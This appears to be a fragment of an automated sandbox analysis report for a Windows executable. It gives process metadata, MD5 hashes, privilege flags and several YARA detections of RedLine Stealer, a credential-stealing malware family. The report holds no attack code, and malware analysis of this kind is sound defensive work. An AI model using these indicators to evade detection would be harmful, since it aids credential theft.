                                                                                                                                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Start time:04:59:24
                                                                                                                                                                                                    Start date:14/01/2022
                                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\7D0A.exe
                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                    Commandline:C:\Users\user\AppData\Local\Temp\7D0A.exe
                                                                                                                                                                                                    Imagebase:0x650000
                                                                                                                                                                                                    File size:537088 bytes
                                                                                                                                                                                                    MD5 hash:D7DF01D8158BFADDC8BA48390E52F355
                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                    Programmed in:.Net C# or VB.NET
                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                    • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000025.00000000.429672404.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                    • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000025.00000000.428360740.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                    • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000025.00000000.429057949.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                    • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000025.00000002.520312697.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                    • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000025.00000000.427833642.0000000000402000.00000040.00000001.sdmp, Author: Joe Security

                                                                                                                                                                                                    Disassembly

                                                                                                                                                                                                    Code Analysis

                                                                                                                                                                                                    Reset < >